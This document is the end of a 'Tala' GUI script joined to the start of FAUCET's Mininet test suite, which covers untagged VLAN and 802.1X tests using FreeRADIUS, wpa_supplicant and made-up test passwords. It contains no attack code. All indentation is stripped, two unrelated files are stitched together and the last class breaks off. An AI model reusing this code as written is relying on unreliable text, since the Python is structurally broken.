# TODO: Handle the graph here
# if event == "Show":
# # Example dataframe to be graphed
# df = pd.DataFrame({ 'from':['A', 'B', 'C','A'], 'to':['D', 'C', 'A','B']})
# # Builds graph as G
# G=nx.from_pandas_edgelist(df, 'from', 'to')
# # Plot G, but does not show graph yet
# # Node color can be changed through node_color using color name or hex value
# # Node shape can be changed using node_shape can be one of 'so^>v<dph8' w/ o as default
# # s=square, o=oval/circle, ^<v>=triangles, d=diamond, p=pentagon, h=hexagon, 8=octogon
# nx.draw(G, node_color = 'green', node_shape = 'h', with_labels=True)
# # draw graph on Canvas of GUI
# fig_photo = draw_figure(window['-CANVAS-'].TKCanvas, fig)
# # if event == "Show":
# # if event == "Kill Node":
# # if event == "Kill Channel":
# Stop event
if event == "Stop":
print("Stopping server")
server_run = False
print("Cleaning up...")
window.close()
server_thr.join()
print('Exit Tala')
server_run = False
# Intialize the data array with default values
data = [5000, 5050, 1000]
# Store the channels into a dictionary
channel_list = dict()
if __name__ == "__main__":
main() |
mininet_tests.py | #!/usr/bin/env python3
"""Mininet tests for FAUCET."""
# pylint: disable=too-many-lines
# pylint: disable=missing-class-docstring,missing-function-docstring
# pylint: disable=too-many-arguments
import binascii
import collections
import copy
import itertools
import ipaddress
import json
import os
import random
import re
import shutil
import socket
import threading
import time
import unittest
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import scapy.all
from mininet.log import error
from mininet.util import pmonitor
from faucet.config_parser_util import yaml_load
from clib import mininet_test_base
from clib import mininet_test_util
from clib.mininet_test_base import PEER_BGP_AS, IPV4_ETH, IPV6_ETH
MIN_MBPS = 100
CONFIG_BOILER_UNTAGGED = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
CONFIG_TAGGED_BOILER = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_2)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_3)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_4)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
"""
class QuietHTTPServer(HTTPServer):
allow_reuse_address = True
timeout = None
@staticmethod
def handle_error(_request, _client_address):
return
class PostHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args): # pylint: disable=redefined-builtin
return
def _log_post(self):
content_len = int(self.headers.get('content-length', 0))
content = self.rfile.read(content_len).decode().strip()
if content and hasattr(self.server, 'influx_log'):
with open(self.server.influx_log, 'a', encoding='utf-8') as influx_log:
influx_log.write(content + '\n')
class InfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
return self.send_response(204)
class SlowInfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
time.sleep(self.server.timeout * 3)
return self.send_response(500)
class FaucetTest(mininet_test_base.FaucetTestBase):
pass
class FaucetUntaggedTest(FaucetTest):
"""Basic untagged VLAN test."""
HOST_NAMESPACE = {}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
EVENT_SOCK_HEARTBEAT = '5'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
# pylint: disable=invalid-name
CONFIG = CONFIG_BOILER_UNTAGGED
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
def verify_events_log(self, event_log, timeout=10):
required_events = {'CONFIG_CHANGE', 'PORT_CHANGE', 'L2_LEARN', 'PORTS_STATUS', 'EVENT_SOCK_HEARTBEAT'}
for _ in range(timeout):
prom_event_id = self.scrape_prometheus_var('faucet_event_id', dpid=False)
event_id = None
with open(event_log, 'r', encoding='utf-8') as event_log_file:
for event_log_line in event_log_file.readlines():
event = json.loads(event_log_line.strip())
event_id = event['event_id']
required_events -= set(event.keys())
if prom_event_id == event_id:
return
time.sleep(1)
self.assertEqual(prom_event_id, event_id)
self.assertFalse(required_events)
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
self._enable_event_log()
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.verify_traveling_dhcp_mac()
self.gauge_smoke_test()
self.prometheus_smoke_test()
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_events_log(self.event_log)
class Faucet8021XBase(FaucetTest):
NUM_FAUCET_CONTROLLERS = 1
NUM_GAUGE_CONTROLLERS = 1
HOST_NAMESPACE = {3: False}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
RADIUS_PORT = None
DOT1X_EXPECTED_EVENTS = []
SESSION_TIMEOUT = 3600
LOG_LEVEL = 'DEBUG'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="microphone"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="admin"
password="megaphone"
}
"""
freeradius_user_conf = """user Cleartext-Password := "microphone"
Session-timeout = {0}
admin Cleartext-Password := "megaphone"
Session-timeout = {0}
vlanuser1001 Cleartext-Password := "password"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan1"
vlanuser2222 Cleartext-Password := "milliphone"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan2"
filter_id_user_accept Cleartext-Password := "accept_pass"
Filter-Id = "accept_acl"
filter_id_user_deny Cleartext-Password := "deny_pass"
Filter-Id = "deny_acl"
"""
eapol1_host = None
eapol2_host = None
ping_host = None
nfv_host = None
nfv_intf = None
nfv_portno = None
@staticmethod
def _priv_mac(host_id):
two_byte_port_num = '%04x' % host_id
two_byte_port_num_formatted = ':'.join((two_byte_port_num[:2], two_byte_port_num[2:]))
return '00:00:00:00:%s' % two_byte_port_num_formatted
def pre_start_net(self):
self.eapol1_host, self.eapol2_host, self.ping_host, self.nfv_host = self.hosts_name_ordered()
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(self.nfv_host)[0]
nfv_intf = [
intf for intf in last_host_switch_link if intf in switch.intfList()][0]
self.nfv_intf = str(nfv_intf)
nfv_intf = self.nfv_host.intf()
self.RADIUS_PORT = mininet_test_util.find_free_udp_port(self.ports_sock, self._test_name())
self.CONFIG = self.CONFIG.replace('NFV_INTF', str(nfv_intf))
self.CONFIG = self.CONFIG.replace('RADIUS_PORT', str(self.RADIUS_PORT))
super()._init_faucet_config()
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
self.nfv_portno = self.port_map['port_4']
self.host_drop_all_ips(self.nfv_host)
self.nfv_pids = []
tcpdump_args = '-e -n -U'
self.eapol1_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -w %s/%s-start.pcap %s ether proto 0x888e &' % (
self.tmpdir, self.eapol1_host.name, tcpdump_args), 300))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i %s-eth0 -w %s/eap-lo.pcap %s ether proto 0x888e &' % (
self.nfv_host.name, self.tmpdir, tcpdump_args), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i lo -w %s/radius.pcap %s udp port %d &' % (
self.tmpdir, tcpdump_args, self.RADIUS_PORT), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.radius_log_path = self.start_freeradius()
self.nfv_pids.append(int(self.nfv_host.lastPid))
self._enable_event_log(300)
def tearDown(self, ignore_oferrors=False):
for pid in self.nfv_pids:
self.nfv_host.cmd('kill %u' % pid)
super().tearDown(ignore_oferrors=ignore_oferrors)
def post_test_checks(self):
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_dot1x_events_log()
def verify_dot1x_events_log(self):
def replace_mac(host_no):
replacement_macs = {
'HOST1_MAC': self.eapol1_host.MAC(),
'HOST2_MAC': self.eapol2_host.MAC(),
'HOST3_MAC': self.ping_host.MAC(),
'HOST4_MAC': self.nfv_host.MAC(),
}
return replacement_macs.get(host_no, None)
def insert_dynamic_values(dot1x_expected_events):
for dot1x_event in dot1x_expected_events:
top_level_key = list(dot1x_event.keys())[0]
dot1x_params = {'dp_id': int(self.dpid)}
for key, val in dot1x_event[top_level_key].items():
if key == 'port':
dot1x_params[key] = self.port_map[val]
elif key == 'eth_src':
dot1x_params[key] = replace_mac(val)
dot1x_event[top_level_key].update(dot1x_params)
if not self.DOT1X_EXPECTED_EVENTS:
return
dot1x_expected_events = copy.deepcopy(self.DOT1X_EXPECTED_EVENTS)
insert_dynamic_values(dot1x_expected_events)
with open(self.event_log, 'r', encoding='utf-8') as event_file:
events_that_happened = []
for event_log_line in event_file.readlines():
if 'DOT1X' not in event_log_line:
continue
event = json.loads(event_log_line.strip())
events_that_happened.append(event['DOT1X'])
for expected_event in dot1x_expected_events:
self.assertTrue(expected_event in events_that_happened,
msg='expected event: {} not in events_that_happened {}'.format(
expected_event, events_that_happened))
@staticmethod
def _eapol_filter(fields):
return '(' + ' and '.join(('ether proto 0x888e',) + fields) + ')'
def _success_eapol_filter(self, expect_success):
eap_code = '0x04'
if expect_success:
eap_code = '0x03'
return self._eapol_filter(('ether[14:4] == 0x01000004', 'ether[18] == %s' % eap_code))
def _logoff_eapol_filter(self):
return self._eapol_filter(('ether[14:4] == 0x01020000',))
def try_8021x(self, host, port_num, conf, and_logoff=False, terminate_wpasupplicant=False,
wpasup_timeout=180, tcpdump_timeout=30, expect_success=True):
if expect_success:
self.wait_8021x_flows(port_num)
port_labels = self.port_labels(port_num)
success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
tcpdump_filters = [self._success_eapol_filter(expect_success)]
if and_logoff:
tcpdump_filters.append(self._logoff_eapol_filter())
tcpdump_packets = len(tcpdump_filters)
tcpdump_filter = ' or '.join(tcpdump_filters)
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [
lambda: self.wpa_supplicant_callback(
host, port_num, conf, and_logoff,
timeout=wpasup_timeout,
terminate_wpasupplicant=terminate_wpasupplicant)],
timeout=tcpdump_timeout, vflags='-vvv', packets=tcpdump_packets)
if expect_success:
self.wait_for_eap_success(host, self.get_wpa_ctrl_path(host))
if not and_logoff:
self.wait_8021x_success_flows(host, port_num)
success = 'Success' in tcpdump_txt
if expect_success != success:
return False
new_success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
new_failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
new_logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
new_dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
new_dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
new_dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
if expect_success and success:
self.assertGreater(new_success_total, success_total)
self.assertGreater(new_dp_success_total, dp_success_total)
self.assertEqual(failure_total, new_failure_total)
self.assertEqual(dp_failure_total, new_dp_failure_total)
logoff = 'logoff' in tcpdump_txt
if logoff != and_logoff:
return False
if and_logoff:
self.assertGreater(new_logoff_total, logoff_total)
return True
self.assertEqual(logoff_total, new_logoff_total)
self.assertEqual(dp_logoff_total, new_dp_logoff_total)
self.assertEqual(dp_success_total, new_dp_success_total)
self.assertGreaterEqual(new_failure_total, failure_total)
self.assertGreaterEqual(new_dp_failure_total, dp_failure_total)
return False
def retry_8021x(self, host, port_num, conf, and_logoff=False, retries=2, expect_success=True):
for _ in range(retries):
if self.try_8021x(host, port_num, conf, and_logoff, expect_success=expect_success):
return True
time.sleep(1)
return False
def wait_8021x_flows(self, port_no):
port_actions = [
'SET_FIELD: {eth_dst:%s}' % self._priv_mac(port_no), 'OUTPUT:%u' % self.nfv_portno]
from_nfv_actions = [
'SET_FIELD: {eth_src:01:80:c2:00:00:03}', 'OUTPUT:%d' % port_no]
from_nfv_match = {
'in_port': self.nfv_portno, 'dl_src': self._priv_mac(port_no), 'dl_type': 0x888e}
self.wait_until_matching_flow(None, table_id=0, actions=port_actions)
self.wait_until_matching_flow(from_nfv_match, table_id=0, actions=from_nfv_actions)
def wait_8021x_success_flows(self, host, port_no):
from_host_actions = [
'GOTO_TABLE:1']
from_host_match = {
'in_port': port_no, 'dl_src': host.MAC()}
self.wait_until_matching_flow(from_host_match, table_id=0, actions=from_host_actions)
def verify_host_success(self, eapol_host, port_no, wpasupplicant_conf, and_logoff):
self.one_ipv4_ping(
eapol_host, self.ping_host.IP(), require_host_learned=False, expected_result=False)
self.assertTrue(
self.try_8021x(
eapol_host, port_no, wpasupplicant_conf, and_logoff=and_logoff))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(), require_host_learned=False, expected_result=True)
def wpa_supplicant_callback(self, host, port_num, conf, and_logoff, timeout=10, terminate_wpasupplicant=False):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
if os.path.exists(wpa_ctrl_path):
self.terminate_wpasupplicant(host)
for pid in host.cmd('lsof -t %s' % wpa_ctrl_path).splitlines():
try:
os.kill(int(pid), 15)
except (ValueError, ProcessLookupError):
pass
try:
shutil.rmtree(wpa_ctrl_path)
except FileNotFoundError:
pass
log_prefix = host.name + '_'
self.start_wpasupplicant(
host, conf, timeout=timeout,
wpa_ctrl_socket_path=wpa_ctrl_path, log_prefix=log_prefix)
if and_logoff:
self.wait_for_eap_success(host, wpa_ctrl_path)
self.wait_until_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(), require_host_learned=False)
host.cmd('wpa_cli -p %s logoff' % wpa_ctrl_path)
self.wait_until_no_matching_flow(
{'eth_src': host.MAC(), 'in_port': port_num}, table_id=0)
self.one_ipv4_ping(
host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
if terminate_wpasupplicant:
self.terminate_wpasupplicant(host)
def terminate_wpasupplicant(self, host):
wpa_ctrl_path = self.get_wpa_ctrl_path(host)
host.cmd('wpa_cli -p %s terminate' % wpa_ctrl_path)
def get_wpa_ctrl_path(self, host):
wpa_ctrl_path = os.path.join(
self.tmpdir, '%s/%s-wpasupplicant' % (self.tmpdir, host.name))
return wpa_ctrl_path
@staticmethod
def get_wpa_status(host, wpa_ctrl_path):
status = host.cmdPrint('wpa_cli -p %s status' % wpa_ctrl_path)
for line in status.splitlines():
if line.startswith('EAP state'):
return line.split('=')[1].strip()
return None
def wait_for_eap_success(self, host, wpa_ctrl_path, timeout=5):
for _ in range(timeout):
eap_state = self.get_wpa_status(host, wpa_ctrl_path)
if eap_state == 'SUCCESS':
return
time.sleep(1)
self.fail('did not get EAP success: %s' % eap_state)
def wait_for_radius(self, radius_log_path):
self.wait_until_matching_lines_from_file(
r'.*Ready to process requests', radius_log_path)
def start_freeradius(self):
radius_log_path = '%s/radius.log' % self.tmpdir
listen_match = r'(listen {[^}]*(limit {[^}]*})[^}]*})|(listen {[^}]*})'
listen_config = """listen {
type = auth
ipaddr = *
port = %s
}
listen {
type = acct
ipaddr = *
port = %d
}""" % (self.RADIUS_PORT, self.RADIUS_PORT + 1)
if os.path.isfile('/etc/freeradius/users'):
# Assume we are dealing with freeradius 2 configuration
shutil.copytree('/etc/freeradius/', '%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/users' % self.tmpdir
with open('%s/freeradius/radiusd.conf' % self.tmpdir, 'r+', encoding='utf-8') as default_site:
default_config = default_site.read()
default_config = re.sub(listen_match, '', default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.write(listen_config)
default_site.truncate()
else:
# Assume we are dealing with freeradius >=3 configuration
freerad_version = os.popen(
r'freeradius -v | egrep -o -m 1 "Version ([0-9]\.[0.9])"').read().rstrip()
freerad_major_version = freerad_version.split(' ')[1]
shutil.copytree('/etc/freeradius/%s/' % freerad_major_version,
'%s/freeradius' % self.tmpdir)
users_path = '%s/freeradius/mods-config/files/authorize' % self.tmpdir
with open('%s/freeradius/sites-enabled/default' % self.tmpdir, 'r+', encoding='utf-8') as default_site:
default_config = default_site.read()
default_config = re.sub(
listen_match, '', default_config)
default_config = re.sub(
r'server default {', 'server default {\n' + listen_config, default_config)
default_site.seek(0)
default_site.write(default_config)
default_site.truncate()
with open(users_path, 'w', encoding='utf-8') as users_file:
users_file.write(self.freeradius_user_conf.format(self.SESSION_TIMEOUT))
with open('%s/freeradius/clients.conf' % self.tmpdir, 'w', encoding='utf-8') as clients:
clients.write("""client localhost {
ipaddr = 127.0.0.1
secret = SECRET
}""")
with open('%s/freeradius/sites-enabled/inner-tunnel' % self.tmpdir, 'r+', encoding='utf-8') as innertunnel_site:
tunnel_config = innertunnel_site.read()
listen_config = """listen {
ipaddr = 127.0.0.1
port = %d
type = auth
}""" % (self.RADIUS_PORT + 2)
tunnel_config = re.sub(listen_match, listen_config, tunnel_config)
innertunnel_site.seek(0)
innertunnel_site.write(tunnel_config)
innertunnel_site.truncate()
os.system('chmod o+rx %s' % self.root_tmpdir)
os.system('chown -R root:freerad %s/freeradius/' % self.tmpdir)
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'freeradius -X -l %s -d %s/freeradius &' % (radius_log_path, self.tmpdir),
300))
self.wait_for_radius(radius_log_path)
return radius_log_path
class Faucet8021XSuccessTest(Faucet8021XBase):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'success'}},
{'AUTHENTICATION': {'port': 'port_2', 'eth_src': 'HOST2_MAC', 'status': 'logoff'}}]
SESSION_TIMEOUT = 3600
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.verify_host_success(
self.eapol2_host, self.port_map['port_2'], self.wpasupplicant_conf_1, True)
self.post_test_checks()
class Faucet8021XFailureTest(Faucet8021XBase):
"""Failure due to incorrect identity/password"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="wrongpassword"
}
"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'failure'}}]
def test_untagged(self):
self.assertFalse(
self.try_8021x(
self.eapol1_host, self.port_map['port_1'],
self.wpasupplicant_conf_1, and_logoff=False,
expect_success=False))
self.post_test_checks()
class Faucet8021XPortStatusTest(Faucet8021XBase):
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
{'PORT_DOWN': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}}]
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
port_no4 = self.port_map['port_4']
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no1)
# self.wait_until_no_matching_flow(None, table_id=0, actions=actions)
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
self.set_port_down(port_no4)
# self.wait_until_no_matching_flow(match, table_id=0, actions=actions)
self.set_port_up(port_no4)
self.wait_8021x_flows(port_no1)
# check only have rules for port 2 installed, after the NFV port comes up
self.set_port_down(port_no1)
self.flap_port(port_no4)
self.wait_8021x_flows(port_no2)
# no portno1
self.set_port_up(port_no1)
self.wait_8021x_flows(port_no1)
# When the port goes down, and up the host should not be authenticated anymore.
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(), require_host_learned=False)
# terminate so don't automatically reauthenticate when port goes back up.
self.terminate_wpasupplicant(self.eapol1_host)
self.flap_port(port_no1)
self.wait_8021x_flows(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XPortFlapTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
for _ in range(2):
self.set_port_up(port_no1)
self.assertTrue(self.retry_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=True))
self.set_port_down(port_no1)
self.assertFalse(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False, expect_success=False))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
wpa_status = self.get_wpa_status(
self.eapol1_host, self.get_wpa_ctrl_path(self.eapol1_host))
self.assertNotEqual('SUCCESS', wpa_status)
# Kill supplicant so cant reply to the port up identity request.
self.terminate_wpasupplicant(self.eapol1_host)
self.post_test_checks()
class Faucet8021XIdentityOnPortUpTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
# start wpa sup, logon, then send id request.
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
self.set_port_down(port_no1)
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
def port_up(port):
self.set_port_up(port)
self.wait_8021x_flows(port)
username = 'user'
username_bytes = ''.join(('%2x' % ord(c) for c in username))
tcpdump_filter = ' or '.join((
self._success_eapol_filter(True),
self._eapol_filter(('ether[23:4] == 0x%s' % username_bytes,))))
tcpdump_txt = self.tcpdump_helper(
self.eapol1_host, tcpdump_filter, [
lambda: port_up(port_no1)],
timeout=30, vflags='-vvv', packets=2)
for req_str in (
'Identity: %s' % username, # supplicant replies with username
'Success', # supplicant success
):
self.assertTrue(req_str in tcpdump_txt, msg='%s not in %s' % (req_str, tcpdump_txt))
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True, retries=10)
self.post_test_checks()
class Faucet8021XPeriodicReauthTest(Faucet8021XBase):
SESSION_TIMEOUT = 15
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_labels1 = self.port_labels(port_no1)
self.set_port_up(port_no1)
self.assertTrue(self.try_8021x(
self.eapol1_host, port_no1, self.wpasupplicant_conf_1, and_logoff=False))
last_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
for _ in range(4):
for _ in range(self.SESSION_TIMEOUT * 2):
total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels1, default=0)
if total > last_total:
break
time.sleep(1)
self.assertGreater(total, last_total, msg='failed to successfully re-auth')
last_total = total
self.post_test_checks()
class Faucet8021XConfigReloadTest(Faucet8021XBase):
def test_untagged(self):
port_no1 = self.port_map['port_1']
port_no2 = self.port_map['port_2']
self.wait_8021x_flows(port_no1)
self.wait_8021x_flows(port_no2)
conf = self._get_faucet_conf()
conf['dps'][self.DP_NAME]['interfaces'][port_no1]['dot1x'] = False
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=True)
self.wait_8021x_flows(port_no2)
self.post_test_checks()
class Faucet8021XCustomACLLoginTest(Faucet8021XBase):
"""Ensure that 8021X Port ACLs Work before and after Login"""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
auth_acl:
- rule:
dl_type: 0x800 # Allow ICMP / IPv4
ip_proto: 1
actions:
allow: True
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
noauth_acl:
- rule:
dl_type: 0x800 # Deny ICMP / IPv4
ip_proto: 1
actions:
allow: False
- rule:
dl_type: 0x0806 # ARP Packets
actions:
allow: True
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
auth_acl: auth_acl
noauth_acl: noauth_acl
interfaces:
%(port_1)d:
name: b1
description: "b1"
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_acl: True
%(port_2)d:
name: b2
description: "b2"
native_vlan: 100
# 802.1X client.
dot1x: True
dot1x_acl: True
%(port_3)d:
name: b3
description: "b3"
native_vlan: 100
# ping host.
%(port_4)d:
name: b4
description: "b4"
output_only: True
# "NFV host - interface used by controller."
"""
def test_untagged(self):
self.verify_host_success(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, False)
self.post_test_checks()
class Faucet8021XCustomACLLogoutTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
def test_untagged(self):
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.assertTrue(self.try_8021x(
self.eapol1_host, self.port_map['port_1'], self.wpasupplicant_conf_1, and_logoff=True))
self.one_ipv4_ping(self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.post_test_checks()
class Faucet8021XMABTest(Faucet8021XSuccessTest):
"""Ensure that 802.1x Port Supports Mac Auth Bypass."""
DOT1X_EXPECTED_EVENTS = [{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC',
'status': 'success'}},
]
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
dot1x_mab: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
def start_freeradius(self):
# Add the host mac address to the FreeRADIUS config
self.freeradius_user_conf += '\n{0} Cleartext-Password := "{0}"'.format(
str(self.eapol1_host.MAC()).replace(':', '')
)
return super().start_freeradius()
def test_untagged(self):
port_no1 = self.port_map['port_1']
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=False)
self.eapol1_host.run_dhclient(self.tmpdir)
self.wait_until_matching_lines_from_faucet_log_files(r'.*AAA_SUCCESS.*')
self.one_ipv4_ping(
self.eapol1_host, self.ping_host.IP(),
require_host_learned=False, expected_result=True)
self.assertEqual(
1,
self.scrape_prometheus_var('port_dot1x_success_total', labels=self.port_labels(port_no1), default=0))
self.post_test_checks()
class Faucet8021XDynACLLoginTest(Faucet8021XCustomACLLoginTest):
"""Ensure that 8021X Port ACLs Work before and after Logout"""
DOT1X_EXPECTED_EVENTS = [
{'ENABLED': {}},
{'PORT_UP': {'port': 'port_1', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_2', 'port_type': 'supplicant'}},
{'PORT_UP': {'port': 'port_4', 'port_type': 'nfv'}},
{'AUTHENTICATION': {'port': 'port_1', 'eth_src': 'HOST1_MAC', 'status': 'success'}},
